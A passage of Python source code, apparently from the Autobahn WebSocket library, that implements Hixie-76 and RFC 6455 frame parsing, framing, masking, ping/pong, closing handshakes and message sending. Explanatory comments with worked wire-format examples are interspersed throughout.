self.send_queue.append((data, sync))
self._trigger()
else:
self.transport.write(data)
if self.logOctets:
self.logTxOctets(data, False)
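# Illustrative sketch of how the chopsize option behaves, assuming this is called
# from within a protocol instance (e.g. inside onOpen). With chopsize set, the
# payload is queued in chopsize-octet chunks and each chunk is flushed in its own
# reactor turn via _trigger()/_send():
#
#   # write "hello" one octet per reactor iteration (useful for wire-level tests)
#   self.sendData("hello", chopsize = 1)
#
#   # write "hello" in a single transport.write() call (the normal fast path)
#   self.sendData("hello")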
def sendPreparedMessage(self, preparedMsg):
"""
Send a message that was previously prepared with
WebSocketFactory.prepareMessage().
Modes: Hybi, Hixie
"""
if self.websocket_version == 0:
self.sendData(preparedMsg.payloadHixie)
else:
self.sendData(preparedMsg.payloadHybi)
def processData(self):
"""
After WebSocket handshake has been completed, this procedure will do all
subsequent processing of incoming bytes.
Modes: Hybi, Hixie
"""
if self.websocket_version == 0:
return self.processDataHixie76()
else:
return self.processDataHybi()
def processDataHixie76(self):
"""
Hixie-76 incoming data processing.
Modes: Hixie
"""
buffered_len = len(self.data)
## outside a message, that is we are awaiting data which starts a new message
##
if not self.inside_message:
if buffered_len >= 2:
## new message
##
if self.data[0] == '\x00':
self.inside_message = True
if self.utf8validateIncoming:
self.utf8validator.reset()
self.utf8validateIncomingCurrentMessage = True
self.utf8validateLast = (True, True, 0, 0)
else:
self.utf8validateIncomingCurrentMessage = False
self.data = self.data[1:]
if self.trackedTimings:
self.trackedTimings.track("onMessageBegin")
self.onMessageBegin(1)
## Hixie close from peer received
##
elif self.data[0] == '\xff' and self.data[1] == '\x00':
self.onCloseFrame(None, None)
self.data = self.data[2:]
# stop receiving/processing after having received close!
return False
## malformed data
##
else:
if self.protocolViolation("malformed data received"):
return False
else:
## need more data
return False
end_index = self.data.find('\xff')
if end_index > 0:
payload = self.data[:end_index]
self.data = self.data[end_index + 1:]
else:
payload = self.data
self.data = ''
## incrementally validate UTF-8 payload
##
if self.utf8validateIncomingCurrentMessage:
self.utf8validateLast = self.utf8validator.validate(payload)
if not self.utf8validateLast[0]:
if self.invalidPayload("encountered invalid UTF-8 while processing text message at payload octet index %d" % self.utf8validateLast[3]):
return False
self.onMessageFrameData(payload)
if end_index > 0:
self.inside_message = False
self.onMessageEnd()
return len(self.data) > 0
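# Wire-format sketch for the Hixie-76 framing parsed above: a text message is a
# 0x00 start byte, the UTF-8 payload, and a 0xFF end byte; the closing handshake
# is the two-octet sequence 0xFF 0x00 (see sendMessageHixie76 and the Hixie branch
# of sendCloseFrame below):
#
#   text message "Hello" : '\x00' + 'Hello' + '\xff'
#   close frame          : '\xff' + '\x00'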
def processDataHybi(self):
"""
RFC6455/Hybi-Drafts incoming data processing.
Modes: Hybi
"""
buffered_len = len(self.data)
## outside a frame, that is we are awaiting data which starts a new frame
##
if self.current_frame is None:
## need a minimum of 2 octets for a new frame
##
if buffered_len >= 2:
## FIN, RSV, OPCODE
##
b = ord(self.data[0])
frame_fin = (b & 0x80) != 0
frame_rsv = (b & 0x70) >> 4
frame_opcode = b & 0x0f
## MASK, PAYLOAD LEN 1
##
b = ord(self.data[1])
frame_masked = (b & 0x80) != 0
frame_payload_len1 = b & 0x7f
## MUST be 0 when no extension defining
## the semantics of RSV has been negotiated
##
if frame_rsv != 0:
if self.protocolViolation("RSV != 0 and no extension negotiated"):
return False
## all client-to-server frames MUST be masked
##
if self.isServer and self.requireMaskedClientFrames and not frame_masked:
if self.protocolViolation("unmasked client-to-server frame"):
return False
## all server-to-client frames MUST NOT be masked
##
if not self.isServer and not self.acceptMaskedServerFrames and frame_masked:
if self.protocolViolation("masked server-to-client frame"):
return False
## check frame
##
if frame_opcode > 7: # control frame (have MSB in opcode set)
## control frames MUST NOT be fragmented
##
if not frame_fin:
if self.protocolViolation("fragmented control frame"):
return False
## control frames MUST have payload 125 octets or less
##
if frame_payload_len1 > 125:
if self.protocolViolation("control frame with payload length > 125 octets"):
return False
## check for reserved control frame opcodes
##
if frame_opcode not in [8, 9, 10]:
if self.protocolViolation("control frame using reserved opcode %d" % frame_opcode):
return False
## close frame : if there is a body, the first two bytes of the body MUST be a 2-byte
## unsigned integer (in network byte order) representing a status code
##
if frame_opcode == 8 and frame_payload_len1 == 1:
if self.protocolViolation("received close control frame with payload len 1"):
return False
else: # data frame
## check for reserved data frame opcodes
##
if frame_opcode not in [0, 1, 2]:
if self.protocolViolation("data frame using reserved opcode %d" % frame_opcode):
return False
## check opcode vs message fragmentation state 1/2
##
if not self.inside_message and frame_opcode == 0:
if self.protocolViolation("received continuation data frame outside fragmented message"):
return False
## check opcode vs message fragmentation state 2/2
##
if self.inside_message and frame_opcode != 0:
if self.protocolViolation("received non-continuation data frame while inside fragmented message"):
return False
## compute complete header length
##
if frame_masked:
mask_len = 4
else:
mask_len = 0
if frame_payload_len1 < 126:
frame_header_len = 2 + mask_len
elif frame_payload_len1 == 126:
frame_header_len = 2 + 2 + mask_len
elif frame_payload_len1 == 127:
frame_header_len = 2 + 8 + mask_len
else:
raise Exception("logic error")
## only proceed when we have enough data buffered for complete
## frame header (which includes extended payload len + mask)
##
if buffered_len >= frame_header_len:
## minimum frame header length (already consumed)
##
i = 2
## extract extended payload length
##
if frame_payload_len1 == 126:
frame_payload_len = struct.unpack("!H", self.data[i:i+2])[0]
if frame_payload_len < 126:
if self.protocolViolation("invalid data frame length (not using minimal length encoding)"):
return False
i += 2
elif frame_payload_len1 == 127:
frame_payload_len = struct.unpack("!Q", self.data[i:i+8])[0]
if frame_payload_len > 0x7FFFFFFFFFFFFFFF: # 2**63
if self.protocolViolation("invalid data frame length (>2^63)"):
return False
if frame_payload_len < 65536:
if self.protocolViolation("invalid data frame length (not using minimal length encoding)"):
return False
i += 8
else:
frame_payload_len = frame_payload_len1
## when payload is masked, extract frame mask
##
frame_mask = None
if frame_masked:
frame_mask = self.data[i:i+4]
i += 4
if frame_masked and frame_payload_len > 0 and self.applyMask:
self.current_frame_masker = createXorMasker(frame_mask, frame_payload_len)
else:
self.current_frame_masker = XorMaskerNull()
## remember rest (payload of current frame after header and everything thereafter)
##
self.data = self.data[i:]
## ok, got complete frame header
##
self.current_frame = FrameHeader(frame_opcode,
frame_fin,
frame_rsv,
frame_payload_len,
frame_mask)
## process begin on new frame
##
self.onFrameBegin()
## reprocess when frame has no payload or there is buffered data left
##
return frame_payload_len == 0 or len(self.data) > 0
else:
return False # need more data
else:
return False # need more data
## inside a started frame
##
else:
## cut out rest of frame payload
##
rest = self.current_frame.length - self.current_frame_masker.pointer()
if buffered_len >= rest:
data = self.data[:rest]
length = rest
self.data = self.data[rest:]
else:
data = self.data
length = buffered_len
self.data = ""
if length > 0:
## unmask payload
##
payload = self.current_frame_masker.process(data)
## process frame data
##
fr = self.onFrameData(payload)
if fr == False:
return False
## fire frame end handler when frame payload is complete
##
if self.current_frame_masker.pointer() == self.current_frame.length:
fr = self.onFrameEnd()
if fr == False:
return False
## reprocess when no error occurred and buffered data left
##
return len(self.data) > 0
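# Worked example for the header parsing above, using the single unmasked text
# frame "Hello" from RFC 6455 (octets 0x81 0x05 0x48 0x65 0x6c 0x6c 0x6f):
#
#   b = 0x81 -> frame_fin          = (0x81 & 0x80) != 0  -> True
#               frame_rsv          = (0x81 & 0x70) >> 4  -> 0
#               frame_opcode       = 0x81 & 0x0f         -> 1 (text)
#   b = 0x05 -> frame_masked       = (0x05 & 0x80) != 0  -> False
#               frame_payload_len1 = 0x05 & 0x7f         -> 5 (no extended length)
#
# so frame_header_len == 2 and the remaining 5 octets are the payload "Hello".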
def onFrameBegin(self):
"""
Begin of receive new frame.
Modes: Hybi
"""
if self.current_frame.opcode > 7:
self.control_frame_data = []
else:
## new message started
##
if not self.inside_message:
self.inside_message = True
if self.current_frame.opcode == WebSocketProtocol.MESSAGE_TYPE_TEXT and self.utf8validateIncoming:
self.utf8validator.reset()
self.utf8validateIncomingCurrentMessage = True
self.utf8validateLast = (True, True, 0, 0)
else:
self.utf8validateIncomingCurrentMessage = False
if self.trackedTimings:
self.trackedTimings.track("onMessageBegin")
self.onMessageBegin(self.current_frame.opcode)
self.onMessageFrameBegin(self.current_frame.length, self.current_frame.rsv)
def onFrameData(self, payload):
"""
New data received within frame.
Modes: Hybi
"""
if self.current_frame.opcode > 7:
self.control_frame_data.append(payload)
else:
## incrementally validate UTF-8 payload
##
if self.utf8validateIncomingCurrentMessage:
self.utf8validateLast = self.utf8validator.validate(payload)
if not self.utf8validateLast[0]:
if self.invalidPayload("encountered invalid UTF-8 while processing text message at payload octet index %d" % self.utf8validateLast[3]):
return False
self.onMessageFrameData(payload)
def onFrameEnd(self):
"""
End of frame received.
Modes: Hybi
"""
if self.current_frame.opcode > 7:
if self.logFrames:
self.logRxFrame(self.current_frame, self.control_frame_data)
self.processControlFrame()
else:
if self.logFrames:
self.logRxFrame(self.current_frame, self.frame_data)
self.onMessageFrameEnd()
if self.current_frame.fin:
if self.utf8validateIncomingCurrentMessage:
if not self.utf8validateLast[1]:
if self.invalidPayload("UTF-8 text message payload ended within Unicode code point at payload octet index %d" % self.utf8validateLast[3]):
return False
self.onMessageEnd()
self.inside_message = False
self.current_frame = None
def processControlFrame(self):
"""
Process a completely received control frame.
Modes: Hybi
"""
payload = ''.join(self.control_frame_data)
self.control_frame_data = None
## CLOSE frame
##
if self.current_frame.opcode == 8:
code = None
reasonRaw = None
ll = len(payload)
if ll > 1:
code = struct.unpack("!H", payload[0:2])[0]
if ll > 2:
reasonRaw = payload[2:]
if self.onCloseFrame(code, reasonRaw):
return False
## PING frame
##
elif self.current_frame.opcode == 9:
self.onPing(payload)
## PONG frame
##
elif self.current_frame.opcode == 10:
self.onPong(payload)
else:
## we might arrive here, when protocolViolation
## wants us to continue anyway
pass
return True
def sendFrame(self, opcode, payload = "", fin = True, rsv = 0, mask = None, payload_len = None, chopsize = None, sync = False):
"""
Send out frame. Normally only used internally via sendMessage(), sendPing(), sendPong() and sendClose().
This method deliberately allows sending invalid frames (that is, frames invalid
per se, or frames invalid because of protocol state). Other than in fuzzing servers,
calling methods will ensure that no invalid frames are sent.
In addition, this method supports explicit specification of payload length.
When payload_len is given, it will always write that many octets to the stream.
It will wrap within the payload, resending parts of it when more octets were requested.
The use case is again fuzzing servers which want to send increasing amounts
of payload data to peers without having to construct potentially large messages
themselves.
Modes: Hybi
"""
if self.websocket_version == 0:
raise Exception("function not supported in Hixie-76 mode")
if payload_len is not None:
if len(payload) < 1:
raise Exception("cannot construct repeated payload with length %d from payload of length %d" % (payload_len, len(payload)))
l = payload_len
pl = ''.join([payload for k in range(payload_len / len(payload))]) + payload[:payload_len % len(payload)]
else:
l = len(payload)
pl = payload
## first byte
##
b0 = 0
if fin:
b0 |= (1 << 7)
b0 |= (rsv % 8) << 4
b0 |= opcode % 128
## second byte, payload len bytes and mask
##
b1 = 0
if mask or (not self.isServer and self.maskClientFrames) or (self.isServer and self.maskServerFrames):
b1 |= 1 << 7
if not mask:
mask = struct.pack("!I", random.getrandbits(32))
mv = mask
else:
mv = ""
## mask frame payload
##
if l > 0 and self.applyMask:
masker = createXorMasker(mask, l)
plm = masker.process(pl)
else:
plm = pl
else:
mv = ""
plm = pl
el = ""
if l <= 125:
b1 |= l
elif l <= 0xFFFF:
b1 |= 126
el = struct.pack("!H", l)
elif l <= 0x7FFFFFFFFFFFFFFF:
b1 |= 127
el = struct.pack("!Q", l)
else:
raise Exception("invalid payload length")
raw = ''.join([chr(b0), chr(b1), el, mv, plm])
if self.logFrames:
frameHeader = FrameHeader(opcode, fin, rsv, l, mask)
self.logTxFrame(frameHeader, payload, payload_len, chopsize, sync)
## send frame octets
##
self.sendData(raw, sync, chopsize)
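# Worked example of the frame construction above for an unmasked, final text
# frame with payload "Hello" (the server-to-client example from RFC 6455):
#
#   b0 = (1 << 7) | 1  ->  0x81   (FIN set, RSV 0, opcode 1 = text)
#   b1 = 5             ->  0x05   (no mask bit, payload length 5, no extended length)
#   raw = '\x81\x05Hello'
#
# With masking enabled (client-to-server), b1 would have the high bit set (0x85)
# and a 4-octet mask plus the XOR-masked payload would follow the header.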
def sendPing(self, payload = None):
"""
Send out Ping to peer. A peer is expected to Pong back the payload as soon
as "practical". When more than 1 Ping is outstanding at a peer, the peer may
elect to respond only to the last Ping.
Modes: Hybi
:param payload: An optional, arbitrary payload of length < 126 octets.
:type payload: str
"""
if self.websocket_version == 0:
raise Exception("function not supported in Hixie-76 mode")
if self.state != WebSocketProtocol.STATE_OPEN:
return
if payload:
l = len(payload)
if l > 125:
raise Exception("invalid payload for PING (payload length must be <= 125, was %d)" % l)
self.sendFrame(opcode = 9, payload = payload)
else:
self.sendFrame(opcode = 9)
def sendPong(self, payload = None):
"""
Send out Pong to peer. A Pong frame MAY be sent unsolicited.
This serves as a unidirectional heartbeat. A response to an unsolicited pong is "not expected".
Modes: Hybi
:param payload: An optional, arbitrary payload of length < 126 octets.
:type payload: str
"""
if self.websocket_version == 0:
raise Exception("function not supported in Hixie-76 mode")
if self.state != WebSocketProtocol.STATE_OPEN:
return
if payload:
l = len(payload)
if l > 125:
raise Exception("invalid payload for PONG (payload length must be <= 125, was %d)" % l)
self.sendFrame(opcode = 10, payload = payload)
else:
self.sendFrame(opcode = 10)
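# Minimal usage sketch for the ping/pong API above, assuming a derived protocol
# class (the class name and payload are hypothetical, not part of this module):
#
#   class KeepaliveProtocol(WebSocketServerProtocol):
#
#      def onOpen(self):
#         # ping the peer right after the opening handshake completed
#         self.sendPing("keepalive")
#
#      def onPong(self, payload):
#         log.msg("pong received: %s" % payload)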
def sendCloseFrame(self, code = None, reasonUtf8 = None, isReply = False):
"""
Send a close frame and update protocol state. Note that this is
an internal method which deliberately allows sending a close
frame with an invalid payload.
Modes: Hybi, Hixie
Notes:
- For Hixie mode, this method is slightly misnamed for historic reasons.
- For Hixie mode, code and reasonUtf8 will be silently ignored.
"""
if self.state == WebSocketProtocol.STATE_CLOSING:
if self.debugCodePaths:
log.msg("ignoring sendCloseFrame since connection is closing")
elif self.state == WebSocketProtocol.STATE_CLOSED:
if self.debugCodePaths:
log.msg("ignoring sendCloseFrame since connection already closed")
elif self.state in [WebSocketProtocol.STATE_PROXY_CONNECTING, WebSocketProtocol.STATE_CONNECTING]:
raise Exception("cannot close a connection not yet connected")
elif self.state == WebSocketProtocol.STATE_OPEN:
if self.websocket_version == 0:
self.sendData("\xff\x00")
else:
## construct Hybi close frame payload and send frame
payload = ""
if code is not None:
payload += struct.pack("!H", code)
if reasonUtf8 is not None:
payload += reasonUtf8
self.sendFrame(opcode = 8, payload = payload)
## update state
self.state = WebSocketProtocol.STATE_CLOSING
self.closedByMe = not isReply
## remember payload of close frame we sent
self.localCloseCode = code
self.localCloseReason = reasonUtf8
## drop connection when timeout on receiving close handshake reply
if self.closedByMe and self.closeHandshakeTimeout > 0:
self.closeHandshakeTimeoutCall = reactor.callLater(self.closeHandshakeTimeout, self.onCloseHandshakeTimeout)
else:
raise Exception("logic error")
def sendClose(self, code = None, reason = None):
"""
Starts a closing handshake.
Modes: Hybi, Hixie
Notes:
- For Hixie mode, code and reason will be silently ignored.
:param code: An optional close status code (:class:`WebSocketProtocol`.CLOSE_STATUS_CODE_NORMAL or 3000-4999).
:type code: int
:param reason: An optional close reason (a string; when present, a status code MUST also be present).
:type reason: str
"""
if code is not None:
if type(code) != int:
raise Exception("invalid type %s for close code" % type(code))
if code != 1000 and not (code >= 3000 and code <= 4999):
raise Exception("invalid close code %d" % code)
if reason is not None:
if code is None:
raise Exception("close reason without close code")
if type(reason) not in [str, unicode]:
raise Exception("invalid type %s for close reason" % type(reason))
reasonUtf8 = reason.encode("UTF-8")
if len(reasonUtf8) + 2 > 125:
raise Exception("close reason too long (%d)" % len(reasonUtf8))
else:
reasonUtf8 = None
self.sendCloseFrame(code = code, reasonUtf8 = reasonUtf8, isReply = False)
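# Usage sketch for sendClose(): either a plain close, or a close with an
# application-defined code (3000-4999) and a short UTF-8 reason, per the checks above:
#
#   self.sendClose()                                   # no code, no reason
#   self.sendClose(code = 1000)                        # CLOSE_STATUS_CODE_NORMAL
#   self.sendClose(code = 4000, reason = u"going away")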
def beginMessage(self, opcode = MESSAGE_TYPE_TEXT):
"""
Begin sending new message.
Modes: Hybi, Hixie
:param opcode: Message type, normally either WebSocketProtocol.MESSAGE_TYPE_TEXT (default) or
WebSocketProtocol.MESSAGE_TYPE_BINARY (only Hybi mode).
"""
if self.state != WebSocketProtocol.STATE_OPEN:
return
## check if sending state is valid for this method
##
if self.send_state != WebSocketProtocol.SEND_STATE_GROUND:
raise Exception("WebSocketProtocol.beginMessage invalid in current sending state")
if self.websocket_version == 0:
if opcode != 1:
raise Exception("cannot send non-text message in Hixie mode")
self.sendData('\x00')
self.send_state = WebSocketProtocol.SEND_STATE_INSIDE_MESSAGE
else:
if opcode not in [1, 2]:
raise Exception("use of reserved opcode %d" % opcode)
## remember opcode for later (when sending first frame)
##
self.send_message_opcode = opcode
self.send_state = WebSocketProtocol.SEND_STATE_MESSAGE_BEGIN
def beginMessageFrame(self, length, reserved = 0, mask = None):
"""
Begin sending new message frame.
Modes: Hybi
:param length: Length of frame which is started. Must be >= 0 and <= 2^63.
:type length: int
:param reserved: Reserved bits for frame (an integer from 0 to 7). Note that reserved != 0 is only legal when an extension has been negotiated which defines its semantics.
:type reserved: int
:param mask: Optional frame mask. When given, this is used. When None and the peer is a client, a mask will be internally generated. For servers None is default.
:type mask: str
"""
if self.websocket_version == 0:
raise Exception("function not supported in Hixie-76 mode")
if self.state != WebSocketProtocol.STATE_OPEN:
return
## check if sending state is valid for this method
##
if self.send_state not in [WebSocketProtocol.SEND_STATE_MESSAGE_BEGIN, WebSocketProtocol.SEND_STATE_INSIDE_MESSAGE]:
raise Exception("WebSocketProtocol.beginMessageFrame invalid in current sending state")
if (not type(length) in [int, long]) or length < 0 or length > 0x7FFFFFFFFFFFFFFF: # 2**63
raise Exception("invalid value for message frame length")
if type(reserved) is not int or reserved < 0 or reserved > 7:
raise Exception("invalid value for reserved bits")
self.send_message_frame_length = length
if mask:
## explicit mask given
##
assert type(mask) == str
assert len(mask) == 4
self.send_message_frame_mask = mask
elif (not self.isServer and self.maskClientFrames) or (self.isServer and self.maskServerFrames):
## automatic mask:
## - client-to-server masking (if not deactivated)
## - server-to-client masking (if activated)
##
self.send_message_frame_mask = struct.pack("!I", random.getrandbits(32))
else:
## no mask
##
self.send_message_frame_mask = None
## payload masker
##
if self.send_message_frame_mask and length > 0 and self.applyMask:
self.send_message_frame_masker = createXorMasker(self.send_message_frame_mask, length)
else:
self.send_message_frame_masker = XorMaskerNull()
## first byte
##
b0 = (reserved % 8) << 4 # FIN = false .. since with streaming, we don't know when message ends
if self.send_state == WebSocketProtocol.SEND_STATE_MESSAGE_BEGIN:
self.send_state = WebSocketProtocol.SEND_STATE_INSIDE_MESSAGE
b0 |= self.send_message_opcode % 128
else:
pass # message continuation frame
## second byte, payload len bytes and mask
##
b1 = 0
if self.send_message_frame_mask:
b1 |= 1 << 7
mv = self.send_message_frame_mask
else:
mv = ""
el = ""
if length <= 125:
b1 |= length
elif length <= 0xFFFF:
b1 |= 126
el = struct.pack("!H", length)
elif length <= 0x7FFFFFFFFFFFFFFF:
b1 |= 127
el = struct.pack("!Q", length)
else:
raise Exception("invalid payload length")
## write message frame header
##
header = ''.join([chr(b0), chr(b1), el, mv])
self.sendData(header)
## now we are inside message frame ..
##
self.send_state = WebSocketProtocol.SEND_STATE_INSIDE_MESSAGE_FRAME
def sendMessageFrameData(self, payload, sync = False):
"""
Send out data when within message frame (message was begun, frame was begun).
Note that the frame is automatically ended when enough data has been sent;
that is, there is no endMessageFrame, since you have begun the frame specifying
the frame length, which implicitly defined the frame end. This is different from
messages, which you begin and end, since a message can contain an unlimited number
of frames.
Modes: Hybi, Hixie
Notes:
- For Hixie mode, this method is slightly misnamed for historic reasons.
:param payload: Data to send.
:returns: int -- Hybi mode: when the frame is still incomplete, returns the number of outstanding octets; when the frame is complete, returns <= 0, where a value < 0 gives the amount of unconsumed data in the payload argument. Hixie mode: returns None.
"""
if self.state != WebSocketProtocol.STATE_OPEN:
return
if self.websocket_version == 0:
## Hixie Mode
##
if self.send_state != WebSocketProtocol.SEND_STATE_INSIDE_MESSAGE:
raise Exception("WebSocketProtocol.sendMessageFrameData invalid in current sending state")
self.sendData(payload, sync = sync)
return None
else:
## Hybi Mode
##
if self.send_state != WebSocketProtocol.SEND_STATE_INSIDE_MESSAGE_FRAME:
raise Exception("WebSocketProtocol.sendMessageFrameData invalid in current sending state")
rl = len(payload)
if self.send_message_frame_masker.pointer() + rl > self.send_message_frame_length:
l = self.send_message_frame_length - self.send_message_frame_masker.pointer()
rest = -(rl - l)
pl = payload[:l]
else:
l = rl
rest = self.send_message_frame_length - self.send_message_frame_masker.pointer() - l
pl = payload
## mask frame payload
##
plm = self.send_message_frame_masker.process(pl)
## send frame payload
##
self.sendData(plm, sync = sync)
## if we are done with frame, move back into "inside message" state
##
if self.send_message_frame_masker.pointer() >= self.send_message_frame_length:
self.send_state = WebSocketProtocol.SEND_STATE_INSIDE_MESSAGE
## when =0 : frame was completed exactly
## when >0 : frame is still incomplete and that many octets are still left to complete the frame
## when <0 : frame was completed and there was this much unconsumed data in payload argument
##
return rest
def endMessage(self):
"""
End a previously begun message. No more frames may be sent (for that message). You have to
begin a new message before sending again.
Modes: Hybi, Hixie
"""
if self.state != WebSocketProtocol.STATE_OPEN:
return
## check if sending state is valid for this method
##
if self.send_state != WebSocketProtocol.SEND_STATE_INSIDE_MESSAGE:
raise Exception("WebSocketProtocol.endMessage invalid in current sending state [%d]" % self.send_state)
if self.websocket_version == 0:
self.sendData('\x00')
else:
self.sendFrame(opcode = 0, fin = True)
self.send_state = WebSocketProtocol.SEND_STATE_GROUND
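# Sketch of the frame-based (streaming) send API built from the methods above,
# assuming Hybi mode and payload data already available in chunks (chunk1/chunk2
# are illustrative names only):
#
#   self.beginMessage(opcode = WebSocketProtocol.MESSAGE_TYPE_BINARY)
#   self.beginMessageFrame(len(chunk1) + len(chunk2))
#   self.sendMessageFrameData(chunk1)
#   self.sendMessageFrameData(chunk2)   # frame ends automatically when the declared length is reached
#   self.endMessage()                   # sends a final, empty continuation frame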
def sendMessageFrame(self, payload, reserved = 0, mask = None, sync = False):
"""
When a message has begun, send a complete message frame in one go.
Modes: Hybi
"""
if self.websocket_version == 0:
raise Exception("function not supported in Hixie-76 mode")
if self.state != WebSocketProtocol.STATE_OPEN:
return
self.beginMessageFrame(len(payload), reserved, mask)
self.sendMessageFrameData(payload, sync)
def sendMessage(self, payload, binary = False, payload_frag_size = None, sync = False):
"""
Send out a message in one go.
You can send a text or binary message, and optionally specify a payload fragment size.
When the latter is given, the payload will be split up into frames with
payload <= the payload_frag_size given.
Modes: Hybi, Hixie
"""
if self.trackedTimings:
self.trackedTimings.track("sendMessage")
if self.state != WebSocketProtocol.STATE_OPEN:
return
if self.websocket_version == 0:
if binary:
raise Exception("cannot send binary message in Hixie76 mode")
if payload_frag_size:
raise Exception("cannot fragment messages in Hixie76 mode")
self.sendMessageHixie76(payload, sync)
else:
self.sendMessageHybi(payload, binary, payload_frag_size, sync)
def sendMessageHixie76(self, payload, sync = False):
"""
Hixie76-Variant of sendMessage().
Modes: Hixie
"""
self.sendData('\x00' + payload + '\xff', sync = sync)
def sendMessageHybi(self, payload, binary = False, payload_frag_size = None, sync = False):
"""
Hybi-Variant of sendMessage().
Modes: Hybi
"""
## (initial) frame opcode
##
if binary:
opcode = 2
else:
opcode = 1
## explicit payload_frag_size arguments overrides autoFragmentSize setting
##
if payload_frag_size is not None:
pfs = payload_frag_size
else:
if self.autoFragmentSize > 0:
pfs = self.autoFragmentSize
else:
pfs = None
## send unfragmented
##
if pfs is None or len(payload) <= pfs:
self.sendFrame(opcode = opcode, payload = payload, sync = sync)
## send data message in fragments
##
else:
if pfs < 1:
raise Exception("payload fragment size must be at least 1 (was %d)" % pfs)
n = len(payload)
i = 0
done = False
first = True
while not done:
j = i + pfs
if j > n:
done = True
j = n
if first:
self.sendFrame(opcode = opcode, payload = payload[i:j], fin = done, sync = sync)
first = False
else:
self.sendFrame(opcode = 0, payload = payload[i:j], fin = done, sync = sync)
i += pfs
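# Usage sketch for the message-based send API above: send a text message in one
# go, or let a large message be split into continuation frames of at most 1000
# payload octets, either per call or via the factory-wide autoFragmentSize option
# (big_payload and the size are illustrative assumptions):
#
#   self.sendMessage(u"hello world".encode("utf8"))
#   self.sendMessage(big_payload, binary = True, payload_frag_size = 1000)
#
#   # equivalent factory-wide default for all outgoing data messages:
#   factory.setProtocolOptions(autoFragmentSize = 1000)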
class PreparedMessage:
"""
Encapsulates a prepared message to be sent later once or multiple
times. This is used for optimizing Broadcast/PubSub.
The message serialization formats currently created internally are:
* Hybi
* Hixie
The construction of different formats is needed, since we support
mixed clients (speaking different protocol versions).
It will also be the place to add a 3rd format, when we support
the deflate extension, since then, the clients will be mixed
between Hybi-Deflate-Unsupported, Hybi-Deflate-Supported and Hixie.
"""
def __init__(self, payload, binary, masked):
"""
Ctor for a prepared message.
:param payload: The message payload.
:type payload: str
:param binary: Provide `True` for binary payload.
:type binary: bool
:param masked: Provide `True` if WebSocket message is to be masked (required for client to server WebSocket messages).
:type masked: bool
"""
self._initHixie(payload, binary)
self._initHybi(payload, binary, masked)
def _initHixie(self, payload, binary):
if binary:
# silently filter out .. probably do something else:
# base64?
# dunno
self.payloadHixie = ''
else:
self.payloadHixie = '\x00' + payload + '\xff'
def _initHybi(self, payload, binary, masked):
l = len(payload)
## first byte
##
b0 = ((1 << 7) | 2) if binary else ((1 << 7) | 1)
## second byte, payload len bytes and mask
##
if masked:
b1 = 1 << 7
mask = struct.pack("!I", random.getrandbits(32))
if l == 0:
plm = payload
else:
plm = createXorMasker(mask, l).process(payload)
else:
b1 = 0
mask = ""
plm = payload
## payload extended length
##
el = ""
if l <= 125:
b1 |= l
elif l <= 0xFFFF:
b1 |= 126
el = struct.pack("!H", l)
elif l <= 0x7FFFFFFFFFFFFFFF:
b1 |= 127
el = struct.pack("!Q", l)
else:
raise Exception("invalid payload length")
## raw WS message (single frame)
##
self.payloadHybi = ''.join([chr(b0), chr(b1), el, mask, plm])
class WebSocketFactory:
"""
Mixin for
:class:`autobahn.websocket.WebSocketClientFactory` and
:class:`autobahn.websocket.WebSocketServerFactory`.
"""
def prepareMessage(self, payload, binary = False, masked = None):
"""
Prepare a WebSocket message. This can be later used on multiple
instances of :class:`autobahn.websocket.WebSocketProtocol` using
:meth:`autobahn.websocket.WebSocketProtocol.sendPreparedMessage`.
By doing so, you can avoid the (small) overhead of framing the
*same* payload into WS messages when that payload is to be sent
out on multiple connections.
Caveats:
1. Only use when you know what you are doing. I.e. calling
:meth:`autobahn.websocket.WebSocketProtocol.sendPreparedMessage`
on the *same* protocol instance multiple times with the *same*
prepared message might break the spec, since e.g. the frame mask
will be the same!
2. Treat the object returned as opaque. It may change!
Modes: Hybi, Hixie
:param payload: The message payload.
:type payload: str
:param binary: Provide `True` for binary payload.
:type binary: bool
:param masked: Provide `True` if WebSocket message is to be
masked (required for client-to-server WebSocket messages).
:type masked: bool
:returns: obj -- The prepared message.
"""
if masked is None:
masked = not self.isServer
return PreparedMessage(payload, binary, masked)
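# Broadcast sketch using prepareMessage()/sendPreparedMessage(): the payload is
# framed once and then written to many connections. The `clients` registry is an
# assumption here - this module does not maintain one for you:
#
#   msg = factory.prepareMessage("tick", binary = False)
#   for proto in clients:
#      proto.sendPreparedMessage(msg)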
class WebSocketServerProtocol(WebSocketProtocol):
"""
A Twisted protocol for WebSocket servers.
"""
def onConnect(self, connectionRequest):
"""
Callback fired during WebSocket opening handshake when new WebSocket client
connection is about to be established.
Throw HttpException when you don't want to accept the WebSocket
connection request. For example, throw a
`HttpException(httpstatus.HTTP_STATUS_CODE_UNAUTHORIZED[0], "You are not authorized for this!")`.
When you want to accept the connection, return the accepted protocol
from the list of WebSocket (sub)protocols provided by the client, or None to
speak no specific one (or when the client list was empty).
You may also return a pair of `(protocol, headers)` to send additional HTTP `headers`.
:param connectionRequest: WebSocket connection request information.
:type connectionRequest: instance of :class:`autobahn.websocket.ConnectionRequest`
"""
return None
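# Sketch of an onConnect() override, following the contract documented above
# (accept by returning a subprotocol the client offered, or None; reject by
# raising HttpException). The attribute name `protocols` on connectionRequest
# and the "chat" subprotocol are illustrative assumptions:
#
#   def onConnect(self, connectionRequest):
#      if "chat" in connectionRequest.protocols:
#         return "chat"
#      raise HttpException(HTTP_STATUS_CODE_BAD_REQUEST[0], "no supported subprotocol offered")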
def connectionMade(self):
"""
Called by Twisted when new TCP connection from client was accepted. Default
implementation will prepare for initial WebSocket opening handshake.
When overriding in derived class, make sure to call this base class
implementation *before* your code.
"""
self.isServer = True
WebSocketProtocol.connectionMade(self)
self.factory.countConnections += 1
if self.debug:
log.msg("connection accepted from peer %s" % self.peerstr)
def connectionLost(self, reason):
"""
Called by Twisted when established TCP connection from client was lost. Default
implementation will tear down all state properly.
When overriding in derived class, make sure to call this base class
implementation *after* your code.
"""
WebSocketProtocol.connectionLost(self, reason)
self.factory.countConnections -= 1
if self.debug:
log.msg("connection from %s lost" % self.peerstr)
def processProxyConnect(self):
raise Exception("Autobahn isn't a proxy server")
def parseHixie76Key(self, key):
"""
Parse Hixie76 opening handshake key provided by client.
"""
return int(filter(lambda x: x.isdigit(), key)) / key.count(" ")
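# Worked example for the Hixie-76 key parsing above, using a made-up key (not a
# value from the spec): for key = "12 9 8" the digits form the number 1298 and
# the key contains 2 spaces, so parseHixie76Key returns 1298 / 2 == 649.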
def processHandshake(self):
"""
Process WebSocket opening handshake request from client.
"""
## only proceed when we have fully received the HTTP request line and all headers
##
